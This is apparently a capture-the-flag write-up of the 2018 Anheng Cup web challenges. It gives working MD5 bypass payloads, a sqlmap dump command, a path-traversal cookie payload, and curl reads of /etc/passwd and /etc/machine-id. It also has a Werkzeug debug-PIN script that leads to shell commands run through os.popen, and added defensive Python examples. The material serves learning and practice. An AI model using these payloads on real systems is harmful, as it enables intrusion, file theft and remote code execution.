南溟丷


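2018 National College Student Software Testing Competition, Anheng Cup Web Testing Contest, Preliminary Round: Partial Write-up

Preliminary round of the National College Student Software Testing Competition.

A contest of reused challenges.

0x00 Try some input

Take a look yourself and you will solve it http://114.55.36.69:8003

Right-click and view the page source.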

<!DOCTYPE html>
<html>
<head lang="en">
    <meta charset="UTF-8">
    <title>Input</title>
</head>
<body>
<div align="center">
    <input type="text" id="flag" style="width: 200px;margin-left: 100px;" value="" />
    <input type="button" name="" id="" onclick="check();" value="提交"/>
</div>
</body>
<script>
    function check(){
        var flag = document.getElementById("flag").value;
        var str = "d84d9657e5e5e" || 0;
        var str = str + ("ad2ad3fe" && 2);
        var str = str + "a2da9494b8" + "ddea4fd4";
        var str = str.split("").reverse().join("");
        if (str == flag){
            alert("恭喜你已经找到flag!");
        }
    }
</script>
</html>

Modify the JavaScript slightly, then enter any value.

if (str != flag){
    alert(str);
}

This gives flag{4df4aedd8b4949ad2a2e5e5e7569d48d}

0x01 game

Play some Snake http://114.55.36.69:8011

As usual, right-click and view the page source.

<!DOCTYPE html>
<html>
<head>

    <title>Game</title>
    <link rel="stylesheet" type="text/css" href="./css/game.css" />
</head>
<body>
<div id="game-area" tabindex="0">
</div>
<script type="text/javascript" src="./js/game.js"></script>
<script type="text/javascript">
    var mySnakeBoard = new SNAKE.Board( {
        boardContainer: "game-area",
        fullScreen: true
    });
</script>
</body>
</html>

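There was no obvious hint. At first I thought it was hidden in robots.txt, but it was not; in the end I found the following aaencode-encoded code in the JavaScript.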

if (me.snakeLength > 2500){
゚ω゚ノ= /`m´)ノ ~┻━┻ //*´∇`*/ ['_']; o=(゚ー゚) =_=3; c=(゚Θ゚) =(゚ー゚)-(゚ー゚); (゚Д゚) =(゚Θ゚)= (o^_^o)/ (o^_^o);(゚Д゚)={゚Θ゚: '_' ,゚ω゚ノ : ((゚ω゚ノ==3) +'_') [゚Θ゚] ,゚ー゚ノ :(゚ω゚ノ+ '_')[o^_^o -(゚Θ゚)] ,゚Д゚ノ:((゚ー゚==3) +'_')[゚ー゚] }; (゚Д゚) [゚Θ゚] =((゚ω゚ノ==3) +'_') [c^_^o];(゚Д゚) ['c'] = ((゚Д゚)+'_') [ (゚ー゚)+(゚ー゚)-(゚Θ゚) ];(゚Д゚) ['o'] = ((゚Д゚)+'_') [゚Θ゚];(゚o゚)=(゚Д゚) ['c']+(゚Д゚) ['o']+(゚ω゚ノ +'_')[゚Θ゚]+ ((゚ω゚ノ==3) +'_') [゚ー゚] + ((゚Д゚) +'_') [(゚ー゚)+(゚ー゚)]+ ((゚ー゚==3) +'_') [゚Θ゚]+((゚ー゚==3) +'_') [(゚ー゚) - (゚Θ゚)]+(゚Д゚) ['c']+((゚Д゚)+'_') [(゚ー゚)+(゚ー゚)]+ (゚Д゚) ['o']+((゚ー゚==3) +'_') [゚Θ゚];(゚Д゚) ['_'] =(o^_^o) [゚o゚] [゚o゚];(゚ε゚)=((゚ー゚==3) +'_') [゚Θ゚]+ (゚Д゚) .゚Д゚ノ+((゚Д゚)+'_') [(゚ー゚) + (゚ー゚)]+((゚ー゚==3) +'_') [o^_^o -゚Θ゚]+((゚ー゚==3) +'_') [゚Θ゚]+ (゚ω゚ノ +'_') [゚Θ゚]; (゚ー゚)+=(゚Θ゚); (゚Д゚)[゚ε゚]='\\'; (゚Д゚).゚Θ゚ノ=(゚Д゚+ ゚ー゚)[o^_^o -(゚Θ゚)];(o゚ー゚o)=(゚ω゚ノ +'_')[c^_^o];(゚Д゚) [゚o゚]='\"';(゚Д゚) ['_'] ( (゚Д゚) ['_'] (゚ε゚+(゚Д゚)[゚o゚]+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (o^_^o)+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (o^_^o)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+((゚ー゚) + (o^_^o))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (c^_^o)+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (o^_^o))+ (o^_^o)+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ (c^_^o)+ 
(゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ (o^_^o)+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ (o^_^o)+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (o^_^o))+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ (c^_^o)+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ (c^_^o)+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚ー゚)+ (゚Д゚)[゚ε゚]+((゚ー゚) + (o^_^o))+ (c^_^o)+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (o^_^o))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+((゚ー゚) + (o^_^o))+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (o^_^o))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (o^_^o))+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (c^_^o)+ ((o^_^o) 
+(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (o^_^o))+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+((゚ー゚) + (o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (o^_^o))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+((゚ー゚) + (o^_^o))+ (o^_^o)+ (゚Д゚)[゚o゚]) (゚Θ゚)) ('_');
}

Decoding it gives:

if (me.snakeLength > 2500){
    window['flag'] = 'Flag{660332922504a5f06dd871a7fe78ba9c}';
    console.log("Flag{ hahahah wrong!! :(}");
}

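0x02 Simple MD5

Simple MD5 http://114.55.36.69:8004

As usual, right-click and view the page source.

easy MD5 cracking <!--$_POST['data1']!=$_POST['data2']-->fail

A very simple bypass of an MD5 check. It works because PHP's == comparison evaluates strings beginning with 0e as the number 0, so two different digests of that form compare as equal. The payload is as follows.

data1=QNKCDZO&data2=s878926199a

This gives flag{401cf19d304e557349fecda18110c138}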

0x03 Try sending a flag

Try sending a flag http://114.55.36.69:8012

Parameter submission

Try submitting flag as a parameter via POST?

So submit flag=1111111111 via POST, which gives flag{858a14671c27804b63e6e96b0acdfdd7}

0x04 md5

md5 crash http://114.55.36.69:8006

Right-click and view the page source.

MD5 cracking<!-- if((string)$_POST['data1']!==(string)$_POST['data2']&&md5($_POST['data1'])===md5($_POST['data2']))-->fail

Construct the bypass.

POST / HTTP/1.1
Host: 114.55.36.69:8006
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://114.55.36.69:8006/
Content-Type: application/x-www-form-urlencoded
Content-Length: 397
Connection: close
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 0.0.0.0
Pragma: no-cache
Cache-Control: no-cache

data1=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&data2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

The response:

HTTP/1.1 200 OK
Date: Sun, 28 Oct 2018 06:38:13 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 156
Connection: close
Content-Type: text/html; charset=UTF-8

MD5 cracking<!-- if((string)$_POST['data1']!==(string)$_POST['data2']&&md5($_POST['data1'])===md5($_POST['data2']))-->flag{9bd1ee7355b58e53214adb9a37b4cb82}
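
Both MD5 checks (0x02 and 0x04) replayed offline, as an added example that is not part of the original write-up: it approximates PHP's == on numeric strings, feeds in the two payloads shown on this page, and contrasts them with a SHA-256 comparison. The function names and the simplified numeric-string rule are assumptions, as is the md5(...) == md5(...) form of the 0x02 check, which the page describes but does not show.

```python
import hashlib
import hmac
import re
from urllib.parse import unquote_to_bytes

# Shape of a PHP "numeric string" (simplified: no surrounding whitespace).
NUMERIC = re.compile(r"[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?")

def php_loose_eq(a: str, b: str) -> bool:
    """Approximate PHP `==` on two strings: numeric strings compare as numbers."""
    if NUMERIC.fullmatch(a) and NUMERIC.fullmatch(b):
        return float(a) == float(b)
    return a == b

def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()

def loose_md5_match(a: bytes, b: bytes) -> bool:
    """md5(a) == md5(b) as PHP evaluates it (assumed form of the 0x02 check)."""
    return php_loose_eq(md5_hex(a), md5_hex(b))

def strict_md5_match(a: bytes, b: bytes) -> bool:
    """md5(a) === md5(b), the comparison shown in the 0x04 source comment."""
    return md5_hex(a) == md5_hex(b)

def sha256_match(a: bytes, b: bytes) -> bool:
    """Hardened form: collision-resistant hash, exact constant-time compare."""
    return hmac.compare_digest(hashlib.sha256(a).digest(),
                               hashlib.sha256(b).digest())

# Inputs copied from the two payloads on this page.
MAGIC = (b"QNKCDZO", b"s878926199a")
COLLISION = (
    unquote_to_bytes("%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2"),
    unquote_to_bytes("%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2"),
)

if __name__ == "__main__":
    for name, (a, b) in (("0x02", MAGIC), ("0x04", COLLISION)):
        print(name, "distinct:", a != b,
              "loose:", loose_md5_match(a, b),
              "strict:", strict_md5_match(a, b),
              "sha256:", sha256_match(a, b))
```

Switching == to === stops the 0x02 pair but not the 0x04 pair; only replacing MD5 rejects both.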

0x05 News search

A simple news search site http://114.55.36.69:8010

A simple SQL injection in a POST parameter.

python sqlmap.py -r "sql.txt" -p word -D news -T admin -C "flag,username" --dump

This gives flag{f98505d1d12f50a0bd9463e90876630}

0x06 The newly written site

A challenge from the Anheng June monthly contest: Mynote.

http://114.55.36.69:8014

Open robots.txt

User-agent: *
Allow: /controllers/Basecontrol.php
Allow: /controllers/Controllers.php
Allow: /controllers/User.php
Allow: /flag.php

Opening flag.php shows flag{This_1S_A_F4ke_f1aG}... a fake. Capture the traffic.

GET /index.php/picture HTTP/1.1
Host: 114.55.36.69:8014
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://114.55.36.69:8014/index.php/index
Connection: close
Cookie: Picture=YToxMDp7aTowO3M6ODoiMTIzNC5waHAiO2k6MTtzOjE0OiJzb3V0aC5waHA7LmpwZyI7aToyO3M6MTY6IlFRMjAxODEwMjQtMS5qcGciO2k6MztzOjk6InNoZWxsLnBocCI7aTo0O3M6NjoiMTEucGhwIjtpOjU7czo1OiJhLmpwZyI7aTo2O3M6NjoiMTIucGhwIjtpOjc7czo3OiIxMjMucGhwIjtpOjg7czo5OiJzb3V0aC5waHAiO2k6OTtzOjU6IjEucGhwIjt9; PHPSESSID=u8hkg39ac7ao31onanenii8ifd
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 0.0.0.0
Pragma: no-cache
Cache-Control: no-cache

Note that the Picture value in the Cookie looks odd, like base64 encoding.

YToxMDp7aTowO3M6ODoiMTIzNC5waHAiO2k6MTtzOjE0OiJzb3V0aC5waHA7LmpwZyI7aToyO3M6MTY6IlFRMjAxODEwMjQtMS5qcGciO2k6MztzOjk6InNoZWxsLnBocCI7aTo0O3M6NjoiMTEucGhwIjtpOjU7czo1OiJhLmpwZyI7aTo2O3M6NjoiMTIucGhwIjtpOjc7czo3OiIxMjMucGhwIjtpOjg7czo5OiJzb3V0aC5waHAiO2k6OTtzOjU6IjEucGhwIjt9

Base64-decoding it gives a PHP-serialized array of file names: an arbitrary file read through the Cookie.

a:10:{i:0;s:8:"1234.php";i:1;s:14:"south.php;.jpg";i:2;s:16:"QQ20181024-1.jpg";i:3;s:9:"shell.php";i:4;s:6:"11.php";i:5;s:5:"a.jpg";i:6;s:6:"12.php";i:7;s:7:"123.php";i:8;s:9:"south.php";i:9;s:5:"1.php";}

Construct the payload.

a:1:{i:0;s:14:"../../flag.php";}

Base64-encode it.

YToxOntpOjA7czoxNDoiLi4vLi4vZmxhZy5waHAiO30=

Send it in the Cookie.

GET /index.php/picture HTTP/1.1
Host: 114.55.36.69:8014
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://114.55.36.69:8014/index.php/index
Connection: close
Cookie: Picture=YToxOntpOjA7czoxNDoiLi4vLi4vZmxhZy5waHAiO30%3D;PHPSESSID=u8hkg39ac7ao31onanenii8ifd
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 0.0.0.0
Pragma: no-cache
Cache-Control: no-cache

The file that was read is returned base64-encoded.

<img src="" >

Decode it.

<?php

$flag = "flag{N4me_sPac4_Is_Int3r3st1ng}";
echo "flag{This_1S_A_F4ke_f1aG}";
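
The Picture cookie from 0x06 seen from the server's side, as an added example that is not the challenge's code: it parses the base64-wrapped PHP-serialized list and refuses any name that resolves outside the upload directory. The function names and the /srv/app/uploads directory are hypothetical.

```python
import base64
import posixpath
import re
from urllib.parse import unquote

ENTRY = re.compile(rb'i:\d+;s:(\d+):"')

def parse_picture_cookie(value):
    """Decode base64, then read a PHP-serialized list: a:N:{i:K;s:LEN:"...";...}"""
    raw = base64.b64decode(unquote(value), validate=True)
    head = re.match(rb"a:(\d+):\{", raw)
    if not head or not raw.endswith(b"}"):
        raise ValueError("not a serialized array")
    pos, names = head.end(), []
    for _ in range(int(head.group(1))):
        m = ENTRY.match(raw, pos)
        if not m:
            raise ValueError("unexpected entry at offset %d" % pos)
        start, end = m.end(), m.end() + int(m.group(1))
        if raw[end:end + 2] != b'";':
            raise ValueError("declared length does not match content")
        names.append(raw[start:end].decode("utf-8"))
        pos = end + 2
    if pos != len(raw) - 1:
        raise ValueError("trailing data after last entry")
    return names

def resolve_upload(name, base="/srv/app/uploads"):
    """Return the path under `base`, or None if `name` escapes it.
    `base` is a hypothetical directory; symlinks are not resolved here."""
    path = posixpath.normpath(posixpath.join(base, name))
    return path if path.startswith(base + "/") else None

# Constructed benign cookie, built from two file names seen in the original value.
BENIGN = base64.b64encode(b'a:2:{i:0;s:5:"a.jpg";i:1;s:9:"south.php";}').decode()
# Value copied from the modified request on this page.
CRAFTED = "YToxOntpOjA7czoxNDoiLi4vLi4vZmxhZy5waHAiO30%3D"

if __name__ == "__main__":
    for cookie in (BENIGN, CRAFTED):
        for name in parse_picture_cookie(cookie):
            print(repr(name), "->", resolve_upload(name))
```

A stronger design keeps the file list server-side, or signs the cookie, so the client cannot edit it at all.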

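0x07 Test

http://114.55.36.69:8014

Scanning for back-end paths turned up http://114.55.36.69:8013/console

Also, after logging in, the profile page has an arbitrary file read (a senior told me this afterwards; noting it here).

<img src="/image/cGljLmpwZw%3D%3D " alt="">

Just read files with curl.

Then I searched on Baidu; Xianzhi has an article about this, and it is the Debug PIN issue.

We need the following values to compute the PIN.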

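username is the user that started this Flask app

modname is flask.app

getattr(app, '__name__', getattr(app.__class__, '__name__')) is Flask

getattr(mod, '__file__', None) is the absolute path of an app.py in the flask directory

uuid.getnode() is the MAC address of the current machine; str(uuid.getnode()) is the MAC address written in decimal

get_machine_id(): worth stepping into to see what it does

So use the arbitrary file read to collect these values.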

/../../../usr/local/lib/python2.7/dist-packages/flask/app.py
Antarctica:~ south$ curl http://114.55.36.69:8013/image/Ly4uLy4uLy4uL3Vzci9sb2NhbC9saWIvcHl0aG9uMi43L2Rpc3QtcGFja2FnZXMvZmxhc2svYXBwLnB5 >app.py

/../../../etc/machine-id
Antarctica:~ south$ curl http://114.55.36.69:8013/image/Ly4uLy4uLy4uL2V0Yy9tYWNoaW5lLWlk
3e608929fbd39b959f388bf468c9f0b1

/../../../sys/class/net/eth0/address
Antarctica:~ south$ curl http://114.55.36.69:8013/image/Ly4uLy4uLy4uL3N5cy9jbGFzcy9uZXQvZXRoMC9hZGRyZXNz
02:42:c0:a8:2a:21

Reading the MAC address as a hexadecimal number and writing it in decimal gives 2485723343393

/../../../etc/passwd
Antarctica:~ south$ http://114.55.36.69:8013/image/Ly4uLy4uLy4uL2V0Yy9wYXNzd2Q=
-bash: http://114.55.36.69:8013/image/Ly4uLy4uLy4uL2V0Yy9wYXNzd2Q=: No such file or directory
Antarctica:~ south$ curl http://114.55.36.69:8013/image/Ly4uLy4uLy4uL2V0Yy9wYXNzd2Q=
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
mysql:x:999:999::/home/mysql:
ctf:x:1000:1000::/home/ctf:/bin/bash

Finally, here is the script, copied from elsewhere.

import hashlib
from itertools import chain

# Values that describe the running application
probably_public_bits = [
    'ctf',  # username
    'flask.app',  # modname
    'Flask',  # getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python2.7/dist-packages/flask/app.pyc'  # getattr(mod, '__file__', None)
]

# Values read from the host
private_bits = [
    '2485723343393',  # str(uuid.getnode()), /sys/class/net/eth0/address
    '3e608929fbd39b959f388bf468c9f0b1'  # get_machine_id(), /etc/machine-id
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

# Group the digits with dashes
rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

PIN: 228-209-547

Once the PIN is obtained, Python statements can be run in the console.

>>> os.popen('ls /').readlines()
['app\n', 'bin\n', 'boot\n', 'dev\n', 'docker-entrypoint-initdb.d\n', 'entrypoint.sh\n', 'etc\n', 'fff111aaggggg___hhh\n', ]
>>> os.popen('cat /fff111aaggggg___hhh').readlines()
['flag{d93743011d3158db70150a4301018b2c}\n']

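0x08 A hard analysis

No idea what this is; I followed the write-up from Anheng's NetEase Cloud Classroom course and still could not solve it.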